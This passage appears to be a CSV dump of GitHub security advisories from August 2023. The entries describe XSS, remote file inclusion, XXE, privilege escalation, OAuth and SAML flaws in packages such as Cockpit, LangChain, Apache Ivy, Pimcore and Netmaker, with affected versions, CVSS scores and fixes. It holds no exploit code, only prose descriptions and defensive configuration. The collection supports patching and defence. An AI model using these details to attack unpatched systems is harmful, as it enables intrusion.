'https://github.com/gitpython-developers/GitPython/commit/ca965ecc81853bca7675261729143f54e5bf4cdd'}, {'type': 'PACKAGE', 'url': 'https://github.com/gitpython-developers/GitPython'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2023-137.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R/'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T19:48:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-fr9g-2m2h-c27j,2023-08-16T21:00:20Z,2023-08-16T06:30:24Z,2023-08-16T21:00:20Z,[],Duplicate Advisory: @excalidraw/excalidraw Cross-site Scripting vulnerability,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-v7v8-gjv7-ffmr. This link is maintained to preserve external references. ## Original Description Versions of the package @excalidraw/excalidraw from 0.0.0 are vulnerable to Cross-site Scripting (XSS) via embedded links in whiteboard objects due to improper input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@excalidraw/excalidraw'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26140'}, {'type': 'WEB', 'url': 'https://github.com/excalidraw/excalidraw/pull/6728'}, {'type': 'WEB', 'url': 'https://github.com/excalidraw/excalidraw/commit/b33fa6d6f64d27adc3a47b25c0aa55711740d0af'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-EXCALIDRAWEXCALIDRAW-5841658'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:00:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-jm77-qphf-c4w8,2023-08-01T22:34:41Z,2023-08-01T22:34:41Z,,[],pyca/cryptography's wheels include vulnerable OpenSSL,"pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 0.8-41.0.2 are vulnerable to several security issues. More details about the vulnerabilities themselves can be found in https://www.openssl.org/news/secadv/20230731.txt, https://www.openssl.org/news/secadv/20230719.txt, and https://www.openssl.org/news/secadv/20230714.txt. If you are building cryptography source (""sdist"") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'cryptography'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8'}, {'fixed': '41.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/security/advisories/GHSA-jm77-qphf-c4w8'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/commit/b22271cf3c3dd8dc8978f8f4b00b5c7060b6538d'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/commit/bfa4d95f0f356f2d535efd5c775e0fb3efe90ef2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyca/cryptography'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230714.txt'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230719.txt'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230731.txt'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T22:34:41Z', 'nvd_published_at': None}" 1.4.0,GHSA-w3qm-93vf-5hrw,2023-08-09T14:33:39Z,2023-08-06T18:30:25Z,,['CVE-2023-4196'],Cockpit Cross-site Scripting vulnerability,"Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit prior to 2.6.3. For any role that has permission to execute function assets, an attacker can upload a html file and that leads to XSS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4196'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/039a00cc310bff128ca6e6c1c46c6fbad0385c2c'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c275a2d4-721f-49f7-8787-b146af2056a0'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:33:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-c7hh-3v6c-fj4q,2023-08-04T17:26:07Z,2023-08-04T17:26:07Z,,['CVE-2023-38700'],matrix-appservice-irc events can be crafted to leak parts of targeted messages from other bridged rooms,"### Impact It was possible to craft an event such that it would leak part of a targeted message event from another bridged room. This required knowing an event ID to target. ### Patches Please upgrade to 1.0.1. ### Workarounds You can set the `matrixHandler.eventCacheSize` config value to `0` to workaround this bug. However, this may impact performance. ### Credits Discovered and reported by [Val Lorentz](https://valentin-lorentz.fr/). ### For more information If you have any questions or comments about this advisory email us at [security@matrix.org](mailto:security@matrix.org).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'matrix-appservice-irc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-irc/security/advisories/GHSA-c7hh-3v6c-fj4q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38700'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-irc/commit/8bbd2b69a16cbcbeffdd9b5c973fd89d61498d75'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-appservice-irc'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-irc/releases/tag/1.0.1'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-04T17:26:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-hf5p-f83x-5q2g,2023-08-23T22:14:55Z,2023-08-17T21:30:54Z,,['CVE-2023-40315'],OpenNMS privilege escalation vulnerability,"In OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2 and related Meridian versions, any user that has the ROLE_FILESYSTEM_EDITOR can easily escalate their privileges to ROLE_ADMIN or any other role. The solution is to upgrade to Meridian 2023.1.5 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter for reporting this issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp-rest'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '31.0.8'}, {'fixed': '32.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40315'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6250'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/f2caf7d0b9db58b59e98506490aaca37fbf243b6'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/meridian/2023/releasenotes/changelog.html#releasenotes-changelog-Meridian-2023.1.5'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-18T21:51:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-2rf5-3fw8-qm47,2023-08-09T14:38:46Z,2023-08-09T14:38:46Z,,['CVE-2023-39529'],PrestaShop file deletion via attachment API,"### Impact It is possible to delete a file from the server by using the Attachments controller and the Attachments API. ### Patches 8.1.1 ### Found by Kto94 (via Yeswehack) ### Workarounds none ### References none","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-2rf5-3fw8-qm47'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39529'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/b08c647305dc1e9e6a2445b724d13a9733b6ed82'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:38:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-599v-h3q5-g6r9,2023-08-24T22:33:24Z,2023-08-21T20:41:09Z,,['CVE-2023-4453'],Pimcore Cross-site Scripting (XSS) vulnerability in DataObject datetime fields,"### Impact This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites. ### Patches Update to version 10.6.8 or apply this patch manually https://github.com/pimcore/pimcore/commit/234c0c02ea7502071b00ab673fbe4a6ac253080e.patch ### Workarounds Apply patch https://github.com/pimcore/pimcore/commit/234c0c02ea7502071b00ab673fbe4a6ac253080e.patch manually. ### References https://huntr.dev/bounties/245a8785-0fc0-4561-b181-fa20f869d993/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.6.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-599v-h3q5-g6r9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4453'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/234c0c02ea7502071b00ab673fbe4a6ac253080e'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/245a8785-0fc0-4561-b181-fa20f869d993'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:41:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-fj32-q626-pjjc,2023-08-22T16:42:24Z,2023-08-15T18:31:32Z,,['CVE-2023-38860'],LangChain vulnerable to arbitrary code execution,An issue in LangChain v.0.0.231 allows a remote attacker to execute arbitrary code via the prompt parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.231'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38860'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/7641'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/issues/7641'}, {'type': 'PACKAGE', 'url': 'https://github.com/hwchase17/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-145.yaml'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:01:59Z', 'nvd_published_at': None}" 1.4.0,GHSA-wc9j-gc65-3cm7,2023-08-31T21:47:28Z,2023-08-31T21:47:28Z,,['CVE-2023-41034'],DDFFileParser is vulnerable to XXE Attacks,"### Impact `DDFFileParser` and `DefaultDDFFileValidator` (and so `ObjectLoader`) are vulnerable to [XXE Attacks](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing). [DDF file](https://github.com/eclipse-leshan/leshan/wiki/Adding-new-objects#the-lwm2m-model) is a LWM2M format used to store LWM2M object description. Leshan users are impacted only if they parse untrusted DDF files (e.g. if they let external users provide their own model), in that case they MUST upgrade to fixed version. If you parse only trusted DDF file and validate only with trusted xml schema, upgrading is not mandatory. ### Patches This is fixed in **v1.5.0** and **2.0.0-M13**. ### Workarounds No easy way. Eventually writing your own `DDFFileParser`/`DefaultDDFFileValidator` (and so `ObjectLoader`) creating a `DocumentBuilderFactory` with : ```java // For DDFFileParser DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true); factory.setFeature(""http://apache.org/xml/features/disallow-doctype-decl"", true); // Disable DTDs factory.setXIncludeAware(false); // Disable XML Inclusions factory.setExpandEntityReferences(false); // disable expand entity reference nodes // For DefaultDDFFileValidator SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI); factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true); factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, """"); factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, """"); ``` ### References - https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing - https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html - https://semgrep.dev/docs/cheat-sheets/java-xxe/ - https://community.veracode.com/s/article/Java-Remediation-Guidance-for-XXE","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.leshan:leshan-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.leshan:leshan-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-M1'}, {'fixed': '2.0.0-M13'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse-leshan/leshan/security/advisories/GHSA-wc9j-gc65-3cm7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41034'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-leshan/leshan/commit/29577d2879ba8e7674c3b216a7f01193fc7ae013'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-leshan/leshan/commit/4d3e63ac271a817f81fba3e3229c519af7a3049c'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-leshan/leshan'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-leshan/leshan/wiki/Adding-new-objects#the-lwm2m-model'}, {'type': 'WEB', 'url': 'https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing'}]","{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T21:47:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-735f-w79p-282x,2023-08-03T19:40:12Z,2023-08-03T16:32:49Z,,['CVE-2023-4145'],pimcore/customer-management-framework-bundle Cross-site Scripting vulnerability in Segment name,"### Impact As HTML injection works in email an attacker can trick a victim to click on such hyperlinks to redirect him to any malicious site and also can host a XSS page. All this will surely cause some damage to the victim. This could lead to users being tricked into giving logins away to malicious attackers. ### Patches Update to version 3.4.2 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch ### Workarounds Apply https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch manually. ### References https://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/customer-management-framework-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/security/advisories/GHSA-735f-w79p-282x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4145'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/customer-data-framework'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0'}]","{'cwe_ids': ['CWE-79', 'CWE-87'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:32:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-hgj4-h2x3-rfx4,2023-08-09T20:58:47Z,2023-08-09T20:58:47Z,,['CVE-2023-39531'],Sentry vulnerable to incorrect credential validation on OAuth token requests,"### Impact An attacker with sufficient client-side exploits could retrieve a valid access token for another user during the OAuth token exchange due to incorrect credential validation. The client ID must be known and the API application must have already been authorized on the targeted user account. ### Remediation - **Sentry SaaS** customers do not need to take any action. Those with the highest risk will be contacted directly by Sentry. - **Self-hosted installations** should upgrade to version 23.7.2 or higher. ### Workarounds There are no direct workarounds, but users should review applications authorized on their account (_User Settings > Authorized Applications_) and remove any that are no longer needed. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sentry'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '23.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getsentry/sentry/security/advisories/GHSA-hgj4-h2x3-rfx4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39531'}, {'type': 'PACKAGE', 'url': 'https://github.com/getsentry/sentry'}]","{'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T20:58:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-99fg-2h75-m92h,2023-08-31T14:40:30Z,2023-08-28T18:30:53Z,,['CVE-2023-39062'],Spipu HTML2PDF vulnerable to cross-site scripting ,Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'spipu/html2pdf'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39062'}, {'type': 'WEB', 'url': 'https://github.com/spipu/html2pdf/commit/92afd81823d62ad95eb9d034858311bb63aeb4ac'}, {'type': 'WEB', 'url': 'https://github.com/afine-com/CVE-2023-39062'}, {'type': 'WEB', 'url': 'https://github.com/sectroyer/CVEs/tree/main/CVE-2023-39062'}, {'type': 'PACKAGE', 'url': 'https://github.com/spipu/html2pdf'}, {'type': 'WEB', 'url': 'https://github.com/spipu/html2pdf/blob/92afd81823d62ad95eb9d034858311bb63aeb4ac/CHANGELOG.md'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:38:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-3fjv-8r82-6xm9,2023-08-22T17:54:44Z,2023-08-22T00:31:11Z,,['CVE-2023-4301'],Jenkins Fortify Plugin cross-site request forgery vulnerability,"Jenkins Fortify Plugin 22.1.38 and earlier does not perform permission checks in several HTTP endpoints. This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability. Fortify Plugin 22.2.39 requires POST requests and the appropriate permissions for the affected HTTP endpoints.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:fortify'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '22.2.39'}]}], 'database_specific': {'last_known_affected_version_range': '<= 22.1.38'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4301'}, {'type': 'WEB', 'url': 'https://github.com/jenkinsci/fortify-plugin/commit/357d7bfbcb0ff796ea7d078bee13159f1d000f5d'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/fortify-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3115'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-22T17:54:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-2jc4-r94c-rp7h,2023-08-31T18:49:44Z,2023-08-21T09:30:21Z,,['CVE-2022-46751'],Apache Ivy External Entity Reference vulnerability,"Improper Restriction of XML External Entity Reference, XML Injection (aka Blind XPath Injection) vulnerability in Apache Software Foundation Apache Ivy.This issue affects any version of Apache Ivy prior to 2.5.2. When Apache Ivy prior to 2.5.2 parses XML files - either its own configuration, Ivy files or Apache Maven POMs - it will allow downloading external document type definitions and expand any entity references contained therein when used. This can be used to exfiltrate data, access resources only the machine running Ivy has access to or disturb the execution of Ivy in different ways. Starting with Ivy 2.5.2 DTD processing is disabled by default except when parsing Maven POMs where the default is to allow DTD processing but only to include a DTD snippet shipping with Ivy that is needed to deal with existing Maven POMs that are not valid XML files but are nevertheless accepted by Maven. Access can be be made more lenient via newly introduced system properties where needed. Users of Ivy prior to version 2.5.2 can use Java system properties to restrict processing of external DTDs, see the section about ""JAXP Properties for External Access restrictions"" inside Oracle's ""Java API for XML Processing (JAXP) Security Guide"". ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ivy:ivy'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-46751'}, {'type': 'WEB', 'url': 'https://github.com/apache/ant-ivy/commit/2be17bc18b0e1d4123007d579e43ba1a4b6fab3d'}, {'type': 'WEB', 'url': 'https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-94ABC0EE-9DC8-44F0-84AD-47ADD5340477'}, {'type': 'WEB', 'url': 'https://gitbox.apache.org/repos/asf?p=ant-ivy.git;a=commit;h=2be17bc18b0e1d4123007d579e43ba1a4b6fab3d'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/ant-ivy'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/1dj60hg5nr36kjr4p1100dwjrqookps8'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/9gcz4xrsn8c7o9gb377xfzvkb8jltffr'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/06/9'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:39:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-826j-8wp2-4x6q,2023-08-25T18:42:53Z,2023-08-25T18:42:53Z,,['CVE-2023-32079'],Netmaker Vulnerable to Privilege Escalation From Non Admin To Admin User,"### Impact A Mass assignment vulnerability was found allowing a non-admin user to escalate privileges to admin user. ### Patches Issue is patched in 0.17.1, and fixed in 0.18.6+. If Users are using 0.17.1, they should run ""docker pull gravitl/netmaker:v0.17.1"" and ""docker-compose up -d"". This will switch them to the patched users If users are using v0.18.0-0.18.5, they should upgrade to v0.18.6 or later. ### Workarounds If using 0.17.1, can just pull the latest docker image of backend and restart server. ### References Credit to Project Discovery, and in particular https://github.com/rootxharsh , https://github.com/iamnoooob, and https://github.com/projectdiscovery","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/gravitl/netmaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/gravitl/netmaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.18.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gravitl/netmaker/security/advisories/GHSA-826j-8wp2-4x6q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32079'}, {'type': 'PACKAGE', 'url': 'https://github.com/gravitl/netmaker'}]","{'cwe_ids': ['CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T18:42:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-xcq3-7pf3-5jvc,2023-08-09T14:32:48Z,2023-08-06T18:30:25Z,,['CVE-2023-4195'],Cockpit PHP Remote File Inclusion vulnerability,PHP Remote File Inclusion in GitHub repository cockpit-hq/cockpit prior to 2.6.3. Users may upload php files through the system file upload utility to obtain remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4195'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/800c05f1984db291769ffa5fdfb1d3e50968e95b'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0bd5da2f-0e29-47ce-90f3-06518656bfd6'}]","{'cwe_ids': ['CWE-98'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:32:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-vx8m-6fhw-pccw,2023-08-21T20:13:05Z,2023-08-21T20:13:05Z,,['CVE-2023-40178'],@node-saml/node-saml's validatePostRequestAsync does not include checkTimestampsValidityError,"### Summary The lack of checking of current timestamp allows a LogoutRequest XML to be reused multiple times even when the current time is past the NotOnOrAfter. ### Details It was noticed that in the validatePostRequestAsync() flow in saml.js, the current timestamp is never checked. This could present a vulnerability where a user who has an XML LogoutRequest could validated it if the IssueInstance and the NotOnOrAfter are valid along with valid credentials (signature, certificate etc.). ### PoC I was able to validate a sample valid LogoutRequest XML multiple times through postman by sending it to my endpoint regardless if the current present time was past the NotOnOrAfter time. After some further testing, it seems that only the IssueInstance is checked against NotOnOrAfter. Not sure if this was the intended behaviour but I believe having a never expiring valid LogoutRequest could be dangerous. ### Impact This could impact the user where they would be logged out from an expired LogoutRequest. In bigger contexts, if LogoutRequests are sent out in mass to different SPs, this could impact many users on a large scale. ","[{'type': 'CVSS_V3', 'score': 